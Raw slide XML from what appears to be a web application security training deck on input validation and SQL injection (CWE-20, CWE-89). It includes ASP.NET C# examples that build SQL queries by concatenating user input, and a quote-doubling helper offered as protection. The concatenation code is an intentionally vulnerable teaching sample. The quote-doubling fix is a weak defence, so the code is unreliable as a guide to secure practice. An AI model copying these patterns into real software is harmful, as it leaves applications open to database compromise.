                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>//Reading user supplied values from form controls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sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>string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Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Request.Form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>[“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>txtUsername</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”];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sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>string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Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Request.Form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>[“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>txtPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>	//Reading values from URL query string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sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>string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Product</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Request.QueryString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>[“Product”];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8893175" cy="1071546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C#ASP.Net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Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody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5165742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buNone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Arial" charset="0"/>
              </a:rPr>
              <a:t>// Reading data from Session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string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Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = Session[“Username”].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ToString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p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  <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>//Reading data from Browser Cookies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string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Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Request.Cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>[“Username”].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ToString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzTx/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" charset="0"/>
              </a:rPr>
              <a:t>	//Dynamically creating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> statement with user supplied data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string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>queryString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = “SELECT * FROM Users WHERE Username = ‘” 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Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> + “’ AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Passsword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = ‘” 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Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> + “’”;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string queryString1 = “SELECT * FROM Products WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ProductName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> like ‘” 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Product </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>+ “’”;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4935554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Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Different from Network Security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" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Securing the custom source codes that drives your web application.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" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Securing the libraries that are used by the web application.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" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Securing web and application servers.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Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>This is not Fulfilled by Securing the Network.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" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Network Traffic does not filter HTTP content.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" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Firewalls, Intrusion Detection Systems are not designed for this.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What is Web Application Security?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A4554F-7F38-45F7-93A2-EE1772C5313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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1350966"/>
            <a:ext cx="9144000" cy="4864116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a common input validating framework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type conversion to directly convert your input into expected data type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Always sanitize input at both client side and server side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CWE-20: Improper Input Validation - Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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A6A77F-BA07-4C5C-9D44-CAB3AC2E03D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000109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C#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ASP.Net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Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody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>
          <a:xfrm>
            <a:off x="0" y="714356"/>
            <a:ext cx="9144000" cy="5929354"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzTx/>
              <a:buNone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Arial" charset="0"/>
              </a:rPr>
              <a:t>// write a helper function to replace each single quote with 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzTx/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" charset="0"/>
              </a:rPr>
              <a:t> 	// single quotes: MSSQL specific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public static string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>SqlSQuote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(string value)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{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 smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>	return “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>value.Replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”) + “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”;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}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string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>queryString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = “SELECT * FROM Users WHERE Username = ” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>SqlSQuote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Arial" charset="0"/>
              </a:rPr>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>) + “ AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Passsword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = ” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>SqlSQuote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Arial" charset="0"/>
              </a:rPr>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>); string queryString1 = “SELECT * FROM Products WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ProductName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = ” +                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>SqlSQuote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Arial" charset="0"/>
              </a:rPr>
              <a:t>Product</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>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265754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Attackers try to influence SQL that tries to communicate with your database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SQL queries used in authentication and access controls are targeted by guessing their logic to bypass security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Resulting in whole database compromise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CWE-89: Failure to Preserve SQL Query Structure (aka 'SQL Injection')</a:t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09AF61-DB7C-439E-BA0D-51A61B38C01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628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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL Injection – Illustrated</a:t>
            </a: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228600" y="914400"/>
            <a:ext cx="5715000" cy="25796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 sz="900">
              <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4495800" y="2943225"/>
            <a:ext cx="10668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28600" y="3668713"/>
            <a:ext cx="5715000" cy="25796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 sz="1600">
              <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
            </a:endParaRPr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765175" y="5057775"/>
            <a:ext cx="109061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1009650" y="3001963"/>
            <a:ext cx="1588" cy="20558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655" name="AutoShape 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-318816">
            <a:off x="1311275" y="4887913"/>
            <a:ext cx="139700" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 56324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 flipV="1">
            <a:off x="1330325" y="4946650"/>
            <a:ext cx="49213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1379538" y="4946650"/>
            <a:ext cx="5080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658" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="889000" y="5230813"/>
            <a:ext cx="1631950" cy="228600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Firewall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27659" name="AutoShape 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1609725" y="4935538"/>
            <a:ext cx="668337" cy="153988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1968500" y="5043488"/>
            <a:ext cx="2063750" cy="142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661" name="Freeform 14"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1073150" y="2979738"/>
            <a:ext cx="511175" cy="1927225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 72568 w 479"/>
              <a:gd name="T1" fmla="*/ 0 h 980"/>
              <a:gd name="T2" fmla="*/ 72568 w 479"/>
              <a:gd name="T3" fmla="*/ 1524081 h 980"/>
              <a:gd name="T4" fmla="*/ 511175 w 479"/>
              <a:gd name="T5" fmla="*/ 1927225 h 980"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 479"/>
              <a:gd name="T10" fmla="*/ 0 h 980"/>
              <a:gd name="T11" fmla="*/ 479 w 479"/>
              <a:gd name="T12" fmla="*/ 980 h 9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9" h="980">
                <a:moveTo>
                  <a:pt x="68" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="33" y="304"/>
                  <a:pt x="0" y="612"/>
                  <a:pt x="68" y="775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="136" y="938"/>
                  <a:pt x="393" y="937"/>
                  <a:pt x="479" y="980"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="101600">
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="59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2989263" y="4414838"/>
            <a:ext cx="0" cy="60166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663" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2801938" y="4356100"/>
            <a:ext cx="388937" cy="515938"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 33163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ltGray">
          <a:xfrm>
            <a:off x="2368550" y="4489450"/>
            <a:ext cx="1227138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Hardened OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27665" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="2354263" y="41560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Web Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27666" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="2354263" y="38131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App Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27667" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2801938" y="3554413"/>
            <a:ext cx="385762" cy="171450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7668" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2995613" y="3233738"/>
            <a:ext cx="1587" cy="38893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ltGray">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3292475" y="5203825"/>
            <a:ext cx="1631950" cy="228600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Firewall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27670" name="AutoShape 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4012407" y="4933156"/>
            <a:ext cx="666750" cy="150813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7671" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4362450" y="5053013"/>
            <a:ext cx="1033463" cy="15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672" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="-5400000">
            <a:off x="3846513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Databases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27673" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="-5400000">
            <a:off x="4044950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Legacy Systems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27674" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="-5400000">
            <a:off x="4243388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Web Services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27675" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="-5400000">
            <a:off x="4441825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Directories</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27676" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="-5400000">
            <a:off x="4641057" y="2064543"/>
            <a:ext cx="1371600" cy="138113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Human Resrcs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27677" name="Rectangle 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="-5400000">
            <a:off x="4840288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Billing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27678" name="Line 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5099050" y="2971800"/>
            <a:ext cx="6350" cy="2090738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679" name="Rectangle 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="2252663" y="2800350"/>
            <a:ext cx="1455737" cy="260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Custom Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27680" name="Picture 33" descr="TN_hacker"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:lum bright="24000" contrast="42000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="627063" y="1409700"/>
            <a:ext cx="1209675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81" name="Freeform 34"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="3049588" y="3001963"/>
            <a:ext cx="935037" cy="2041525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 72583 w 876"/>
              <a:gd name="T1" fmla="*/ 0 h 1633"/>
              <a:gd name="T2" fmla="*/ 144098 w 876"/>
              <a:gd name="T3" fmla="*/ 1718982 h 1633"/>
              <a:gd name="T4" fmla="*/ 935037 w 876"/>
              <a:gd name="T5" fmla="*/ 1939011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7682" name="Freeform 35"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm flipH="1">
            <a:off x="1968500" y="3001963"/>
            <a:ext cx="955675" cy="2041525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 74185 w 876"/>
              <a:gd name="T1" fmla="*/ 0 h 1633"/>
              <a:gd name="T2" fmla="*/ 147279 w 876"/>
              <a:gd name="T3" fmla="*/ 1718982 h 1633"/>
              <a:gd name="T4" fmla="*/ 955675 w 876"/>
              <a:gd name="T5" fmla="*/ 1939011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00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7683" name="Freeform 36"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm flipH="1">
            <a:off x="4375150" y="3048000"/>
            <a:ext cx="658813" cy="1968500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 51141 w 876"/>
              <a:gd name="T1" fmla="*/ 0 h 1633"/>
              <a:gd name="T2" fmla="*/ 101529 w 876"/>
